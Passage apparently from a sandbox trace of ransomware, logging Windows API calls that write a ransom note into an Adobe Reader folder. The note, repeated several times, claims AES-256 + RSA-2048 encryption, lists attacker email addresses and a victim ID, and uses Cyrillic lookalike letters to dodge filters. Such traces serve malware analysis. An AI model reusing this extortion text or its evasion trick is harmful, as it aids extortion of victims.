y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0071.074] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0071.076] CloseHandle (hObject=0x1ec) returned 1 [0071.076] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\bg85_info.rtf")) returned 0xffffffff [0071.076] GetLastError () returned 0x2 [0071.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d 